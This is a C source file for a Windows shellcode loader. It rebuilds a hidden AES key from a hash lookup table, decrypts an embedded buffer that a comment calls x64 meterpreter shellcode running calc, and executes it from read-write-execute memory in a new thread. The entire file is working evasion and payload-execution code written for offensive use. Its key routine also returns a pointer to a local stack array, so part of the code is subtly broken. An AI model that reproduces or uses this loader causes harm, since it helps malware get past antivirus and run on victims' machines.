/*
    PROGRAMMED BY ORCA : BRUTE FORCING AES KEY ;0
*/
#include <Windows.h>
#include <stdio.h>
#include <time.h>
#include "aes.h"

#define KeySize 32
#define ArraySize 365

BOOL Compare(DWORD32 Hash, DWORD32 TmpHash) {
    if (TmpHash == Hash){
        return TRUE;
    }
    else {
        return FALSE;
    }
}

const char* RandomKeys[ArraySize] = { "js", "uy", "yn", "uv", "as", "qu", "vb", "el", "lo", "ul", "ew", "ju", "qn", "fj", "vj", "nh", "wo", "ta", "nz", "nq", "ox", "we", "tk", "rq", "av", "gk", "ta", "oc", "wc", "qc", "zw", "vf", "di", "rq", "pi", "jf", "gv", "yy", "ji", "ow", "el", "aw", "tz", "wq", "gx", "cg", "kx", "ii", "vx", "ck", "gp", "rc", "vq", "ay", "zl", "ap", "jf", "mo", "jj", "pm", "ag", "ei", "oa", "xg", "lm", "qq", "dp", "qh", "ix", "sy", "vr", "jh", "jp", "pd", "wi", "pf", "vf", "jo", "fg", "er", "ak", "yo", "wo", "gh", "eq", "pj", "pj", "ud", "jo", "su", "ui", "fq", "wr", "xm", "eh", "hi", "gq", "tf", "za", "uk", "is", "zb", "up", "ch", "tz", "om", "hi", "pi", "qw", "vq", "ye", "ot", "pq", "du", "cz", "jc", "jv", "ba", "bb", "ir", "ps", "co", "qn", "pp", "oe", "kt", "xd", "ux", "xw", "yu", "jf", "zb", "fm", "et", "gi", "ub", "rw", "kc", "rg", "jm", "jy", "ta", "re", "mg", "zc", "ax", "xd", "tt", "mu", "bu", "pi", "fd", "wr", "vg", "lm", "ue", "bf", "re", "uo", "vj", "zq", "vc", "sw", "dx", "ax", "ak", "zv", "eh", "wo", "uf", "an", "fh", "ze", "xi", "bm", "oz", "db", "jh", "zx", "dg", "jj", "px", "sb", "hs", "vb", "ux", "mf", "ug", "wy", "xt", "vm", "ac", "xi", "dy", "ky", "ff", "mc", "vn", "qd", "cw", "zw", "bf", "ag", "ej", "yd", "vp", "uj", "mq", "uk", "uq", "ri", "js", "ul", "ri", "my", "tl", "qt", "nu", "ji", "pw", "ew", "rs", "vv", "br", "ea", "bg", "rz", "gn", "dw", "tl", "tu", "bo", "yr", "bc", "pm", "nh", "nu", "wv", "oh", "yp", "xe", "wv", "mp", "tk", "ps", "mq", "pe", "wm", "ql", "ph", "ba", "bi", "ru", "ba", "qj", "mz", "xo", "yg", "rq", "xt", "dp", "zw", "ho", "yn", "bs", "zq", "ad", "sb", "ab", "xe", "oo", "oh", "kh", "vb", "xt", "mk", "is", "gt", "ln", "ta", "gn", "vy", "qt", "kt", "md", "lb", "oy", "hc", "db", "sq", "dp", "pd", "dp", "lb", "ws", "bh", "mo", "yp", "az", "kb", "yw", "eh", "ys", "xb", "oj", "zi", "ta", "om", "na", "tf", "ip", "xb", "mn", "rw", "fw", "tj", "oc", "kk", "kr", "uw", "sj", "br", "yu", "bm", "on", "gh", "be", "pd", "jn", "py", "xm", "kj", "oj", "en", "wn", "tg", "xo", "qv", "hf", "pm", "vc", "hv", "ep", "ux", "zr", "zm", "ki", "qb", "nr", "ei", "fe", "tt", "bm", "no", "bx", "mf", "sa", "th", "ch", "lr", "jj", "qg", "yn", "qd" };
DWORD32 KeyHashes[ArraySize] = { 0x6ee59734 ,0x6f3d9745 ,0x6f5d973e ,0x6f3d9742 ,0x6e9d972b ,0x6f1d973d ,0x6f45972f ,0x6ebd9728 ,0x6ef59732 ,0x6f3d9738 ,0x6ebd9733 ,0x6ee59736 ,0x6f1d9736 ,0x6ec59727 ,0x6f459737 ,0x6f05972d ,0x6f4d973d ,0x6f35972c ,0x6f05973f ,0x6f059736 ,0x6f0d973e ,0x6f4d9733 ,0x6f359736 ,0x6f25973a ,0x6e9d972e ,0x6ecd9729 ,0x6f35972c ,0x6f0d9729 ,0x6f4d9731 ,0x6f1d972b ,0x6f659748 ,0x6f459733 ,0x6eb59724 ,0x6f25973a ,0x6f159730 ,0x6ee59727 ,0x6ecd9734 ,0x6f5d9749 ,0x6ee5972a ,0x6f0d973d ,0x6ebd9728 ,0x6e9d972f ,0x6f359745 ,0x6f4d973f ,0x6ecd9736 ,0x6ead9721 ,0x6eed973a ,0x6edd9729 ,0x6f459745 ,0x6ead9725 ,0x6ecd972e ,0x6f25972c ,0x6f45973e ,0x6e9d9731 ,0x6f65973d ,0x6e9d9728 ,0x6ee59727 ,0x6efd9733 ,0x6ee5972b ,0x6f159734 ,0x6e9d971f ,0x6ebd9725 ,0x6f0d9727 ,0x6f559736 ,0x6ef59730 ,0x6f1d9739 ,0x6eb5972b ,0x6f1d9730 ,0x6edd9738 ,0x6f2d9743 ,0x6f45973f ,0x6ee59729 ,0x6ee59731 ,0x6f15972b ,0x6f4d9737 ,0x6f15972d ,0x6f459733 ,0x6ee59730 ,0x6ec59724 ,0x6ebd972e ,0x6e9d9723 ,0x6f5d973f ,0x6f4d973d ,0x6ecd9726 ,0x6ebd972d ,0x6f159731 ,0x6f159731 ,0x6f3d9730 ,0x6ee59730 ,0x6f2d973f ,0x6f3d9735 ,0x6ec5972e ,0x6f4d9740 ,0x6f55973c ,0x6ebd9724 ,0x6ed59728 ,0x6ecd972f ,0x6f359731 ,0x6f659732 ,0x6f3d9737 ,0x6edd9733 ,0x6f659733 ,0x6f3d973c ,0x6ead9722 ,0x6f359745 ,0x6f0d9733 ,0x6ed59728 ,0x6f159730 ,0x6f1d973f ,0x6f45973e ,0x6f5d9735 ,0x6f0d973a ,0x6f159738 ,0x6eb59730 ,0x6ead9734 ,0x6ee59724 ,0x6ee59737 ,0x6ea5971a ,0x6ea5971b ,0x6edd9732 ,0x6f15973a ,0x6ead9729 ,0x6f1d9736 ,0x6f159737 ,0x6f0d972b ,0x6eed9736 ,0x6f559733 ,0x6f3d9744 ,0x6f559746 ,0x6f5d9745 ,0x6ee59727 ,0x6f659733 ,0x6ec5972a ,0x6ebd9730 ,0x6ecd9727 ,0x6f3d972e ,0x6f259740 ,0x6eed9725 ,0x6f259730 ,0x6ee5972e ,0x6ee5973a ,0x6f35972c ,0x6f25972e ,0x6efd972b ,0x6f659734 ,0x6e9d9730 ,0x6f559733 ,0x6f35973f ,0x6efd9739 ,0x6ea5972e ,0x6f159730 ,0x6ec59721 ,0x6f4d9740 ,0x6f459734 ,0x6ef59730 ,0x6f3d9731 ,0x6ea5971f ,0x6f25972e ,0x6f3d973b ,0x6f459737 ,0x6f659742 ,0x6f459730 ,0x6f2d9741 ,0x6eb59733 ,0x6e9d9730 ,0x6e9d9723 ,0x6f659747 ,0x6ebd9724 ,0x6f4d973d ,0x6f3d9732 ,0x6e9d9726 ,0x6ec59725 ,0x6f659736 ,0x6f559738 ,0x6ea59726 ,0x6f0d9740 ,0x6eb5971d ,0x6ee59729 ,0x6f659749 ,0x6eb59722 ,0x6ee5972b ,0x6f15973f ,0x6f2d972c ,0x6ed59732 ,0x6f45972f ,0x6f3d9744 ,0x6efd972a ,0x6f3d9733 ,0x6f4d9747 ,0x6f559743 ,0x6f45973a ,0x6e9d971b ,0x6f559738 ,0x6eb59734 ,0x6eed973b ,0x6ec59723 ,0x6efd9727 ,0x6f45973b ,0x6f1d972c ,0x6ead9731 ,0x6f659748 ,0x6ea5971f ,0x6e9d971f ,0x6ebd9726 ,0x6f5d9734 ,0x6f45973d ,0x6f3d9736 ,0x6efd9735 ,0x6f3d9737 ,0x6f3d973d ,0x6f259732 ,0x6ee59734 ,0x6f3d9738 ,0x6f259732 ,0x6efd973d ,0x6f359737 ,0x6f1d973c ,0x6f05973a ,0x6ee5972a ,0x6f15973e ,0x6ebd9733 ,0x6f25973c ,0x6f459743 ,0x6ea5972b ,0x6ebd971d ,0x6ea59720 ,0x6f259743 ,0x6ecd972c ,0x6eb59732 ,0x6f359737 ,0x6f359740 ,0x6ea59728 ,0x6f5d9742 ,0x6ea5971c ,0x6f159734 ,0x6f05972d ,0x6f05973a ,0x6f4d9744 ,0x6f0d972e ,0x6f5d9740 ,0x6f559734 ,0x6f4d9744 ,0x6efd9734 ,0x6f359736 ,0x6f15973a ,0x6efd9735 ,0x6f15972c ,0x6f4d973b ,0x6f1d9734 ,0x6f15972f ,0x6ea5971a ,0x6ea59722 ,0x6f25973e ,0x6ea5971a ,0x6f1d9732 ,0x6efd973e ,0x6f55973e ,0x6f5d9737 ,0x6f25973a ,0x6f559743 ,0x6eb5972b ,0x6f659748 ,0x6ed5972e ,0x6f5d973e ,0x6ea5972c ,0x6f659742 ,0x6e9d971c ,0x6f2d972c ,0x6e9d971a ,0x6f559734 ,0x6f0d9735 ,0x6f0d972e ,0x6eed972a ,0x6f45972f ,0x6f559743 ,0x6efd972f ,0x6edd9733 ,0x6ecd9732 ,0x6ef59731 ,0x6f35972c ,0x6ecd972c ,0x6f459746 ,0x6f1d973c ,0x6eed9736 ,0x6efd9728 ,0x6ef59725 ,0x6f0d973f ,0x6ed59722 ,0x6eb5971d ,0x6f2d973b ,0x6eb5972b ,0x6f15972b ,0x6eb5972b ,0x6ef59725 ,0x6f4d9741 ,0x6ea59721 ,0x6efd9733 ,0x6f5d9740 ,0x6e9d9732 ,0x6eed9724 ,0x6f5d9747 ,0x6ebd9724 ,0x6f5d9743 ,0x6f559731 ,0x6f0d9730 ,0x6f65973a ,0x6f35972c ,0x6f0d9733 ,0x6f059726 ,0x6f359731 ,0x6edd9730 ,0x6f559731 ,0x6efd9732 ,0x6f259740 ,0x6ec59734 ,0x6f359735 ,0x6f0d9729 ,0x6eed972d ,0x6eed9734 ,0x6f3d9743 ,0x6f2d9734 ,0x6ea5972b ,0x6f5d9745 ,0x6ea59726 ,0x6f0d9734 ,0x6ecd9726 ,0x6ea5971e ,0x6f15972b ,0x6ee5972f ,0x6f159740 ,0x6f55973c ,0x6eed972c ,0x6f0d9730 ,0x6ebd972a ,0x6f4d973c ,0x6f359732 ,0x6f55973e ,0x6f1d973e ,0x6ed59725 ,0x6f159734 ,0x6f459730 ,0x6ed59735 ,0x6ebd972c ,0x6f3d9744 ,0x6f659743 ,0x6f65973e ,0x6eed972b ,0x6f1d972a ,0x6f059737 ,0x6ebd9725 ,0x6ec59722 ,0x6f35973f ,0x6ea59726 ,0x6f059734 ,0x6ea59731 ,0x6efd972a ,0x6f2d972b ,0x6f359733 ,0x6ead9722 ,0x6ef59735 ,0x6ee5972b ,0x6f1d972f ,0x6f5d973e ,0x6f1d972c };
//key :  eqynwcagvqeljopdqnpmeqeqjpjouygp
DWORD32 keyhash[KeySize] = { 0x6ebd972d, 0x6f5d973e, 0x6f4d9731, 0x6e9d971f, 0x6f45973e, 0x6ebd9728, 0x6ee59730, 0x6f15972b, 0x6f1d9736, 0x6f159734, 0x6ebd972d, 0x6ebd972d, 0x6ee59731, 0x6ee59730, 0x6f3d9745, 0x6ecd972e };


// dont ask me how tf i did it 
char* GetKey() {
    char Key[KeySize + 1];
    int i = 0, j = 0, index = 0, e = 0;
    while (strlen(Key) < KeySize) {
        while (e != (KeySize/2)){
            if (Compare(keyhash[j], KeyHashes[i])) {
                memcpy(&Key[index], RandomKeys[i], 2);
                index = index + 2;
                j++;
                e++;
            }
            if (i == (ArraySize - 1)) {
                i = 0;
            }
            i++;
        }
    }
    Key[KeySize] = '\0';
    printf("[+] Key[%d] Generated : %s \n", (unsigned int) strlen(Key), Key);
    return Key;
}

// -- x64 calc meterpreter shellcode encrypted with: eqynwcagvqeljopdqnpmeqeqjpjouygp --
unsigned char Encryptedbuffer[288] = {
        0x2b, 0x9f, 0x4d, 0xaf, 0xf2, 0x12, 0xf5, 0xf5, 0x48, 0xed,
        0xc1, 0x98, 0x5e, 0x76, 0x2a, 0x57, 0x1e, 0x7d, 0x95, 0x51,
        0x3f, 0x04, 0x47, 0x84, 0x41, 0x5e, 0x10, 0x43, 0xb8, 0x59,
        0x2d, 0x36, 0x0d, 0x1f, 0xc5, 0xee, 0x2c, 0xc6, 0x03, 0x0f,
        0xb5, 0xc6, 0x86, 0xf9, 0x55, 0x47, 0xd7, 0x8c, 0x55, 0xa9,
        0xdb, 0xe5, 0xa2, 0x22, 0xc9, 0x2f, 0x57, 0x65, 0xc4, 0xd1,
        0xc1, 0x6a, 0xe4, 0x8c, 0xbd, 0x97, 0xc8, 0xe1, 0x34, 0x2e,
        0xea, 0x48, 0x1b, 0x55, 0x4a, 0x38, 0x3b, 0xfc, 0x40, 0x2f,
        0x14, 0x06, 0x16, 0xcd, 0x90, 0xff, 0x61, 0x55, 0x68, 0xea,
        0x6b, 0x69, 0x7a, 0xc3, 0x01, 0x1e, 0x3b, 0x37, 0x50, 0x51,
        0xe5, 0xde, 0xb1, 0x62, 0xc1, 0xba, 0x1a, 0x73, 0x39, 0x48,
        0xe4, 0x90, 0x19, 0xb4, 0x45, 0xfa, 0x13, 0x56, 0x94, 0x84,
        0x7c, 0x0d, 0x81, 0xe7, 0xc0, 0xc3, 0x28, 0x7f, 0x6f, 0x40,
        0xd6, 0xb8, 0x8a, 0x17, 0xc9, 0xff, 0xe4, 0x8a, 0xb8, 0x34,
        0x5a, 0xd7, 0x0d, 0xd6, 0x50, 0x31, 0xae, 0x65, 0x13, 0x4c,
        0x20, 0xaa, 0x83, 0x52, 0xa4, 0x13, 0x6d, 0x25, 0x61, 0xbb,
        0xc0, 0xa2, 0x32, 0x8b, 0x25, 0x37, 0x32, 0x6e, 0xc5, 0xae,
        0x77, 0xfd, 0xa7, 0x07, 0x9a, 0x20, 0x8f, 0x9b, 0xef, 0x67,
        0xac, 0xc9, 0x33, 0x49, 0xc5, 0x00, 0xa7, 0x7c, 0xfe, 0xea,
        0xe7, 0x87, 0xb4, 0x05, 0x90, 0xa6, 0x0a, 0x76, 0x6e, 0x2e,
        0x9e, 0x73, 0x71, 0x50, 0x5f, 0x18, 0x4d, 0x2e, 0x68, 0x98,
        0x2c, 0x06, 0xc5, 0x74, 0x0b, 0x77, 0x90, 0x0a, 0x1c, 0xbd,
        0x95, 0x5d, 0x01, 0x44, 0x5e, 0x82, 0xc7, 0xd9, 0xc2, 0x20,
        0x16, 0x62, 0x80, 0x63, 0x16, 0xdf, 0xff, 0xef, 0xd7, 0x41,
        0xfd, 0xcf, 0xad, 0x8a, 0x96, 0x0a, 0xd2, 0x26, 0x0b, 0xbf,
        0xf3, 0x02, 0x07, 0x07, 0x7d, 0x7c, 0xa6, 0xd6, 0x86, 0x4c,
        0xd0, 0x9b, 0xbc, 0xdd, 0xaf, 0x09, 0xf5, 0x77, 0x03, 0x93,
        0xb2, 0x00, 0x50, 0xcf, 0x16, 0x01, 0x38, 0x30, 0x09, 0x82,
        0xad, 0x74, 0x26, 0x46, 0xff, 0x36, 0xbc
};


int main() {
    printf("[i] Size of RandomKeys Array : %d ; elements : %d\n", (unsigned int)sizeof(RandomKeys), (unsigned int)sizeof(RandomKeys)/ (unsigned int)sizeof(const char*));
    printf("[i] Size of KeyHashes Array : %d ; elements : %d\n", (unsigned int)sizeof(KeyHashes), (unsigned int)sizeof(KeyHashes) / (unsigned int) sizeof(DWORD32));

    //setting the key and the iv:
    char Key[KeySize];
    RtlMoveMemory(Key, GetKey(), KeySize + 1);
    SIZE_T shellcodeSize = sizeof(Encryptedbuffer);
    unsigned char iv[] = "\x9d\x02\x35\x3b\xa3\x4b\xec\x26\x13\x88\x58\x51\x11\x47\xa5\x98";
    //decrypting
    struct AES_ctx ctx;
    AES_init_ctx_iv(&ctx, Key, iv);
    AES_CBC_decrypt_buffer(&ctx, Encryptedbuffer, shellcodeSize);

    //running the shellcode
    LPVOID pBase = NULL;
    pBase = VirtualAllocEx(GetCurrentProcess(), NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (pBase == NULL) {
        printf("[!] VirtualAllocEx failes with error : %d \n", GetLastError());
        return 0;
    }
    //printf("\n[+] pBase ::: 0x%0-16p of size ::: %ld\n", (void*)pBase, shellcodeSize);
    RtlMoveMemory(pBase, Encryptedbuffer, shellcodeSize);
    //printf("[+] Shellcode was Moved, press any key to run the shellcode ... \n");
    //getchar();
    DWORD lpThreadId;
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pBase, NULL, NULL, &lpThreadId);
    Sleep(10);
    //printf("[+] DONE ... \n");

    printf("[#] Press Any Key To Exit ... \n");
    getchar();
    return 0;
}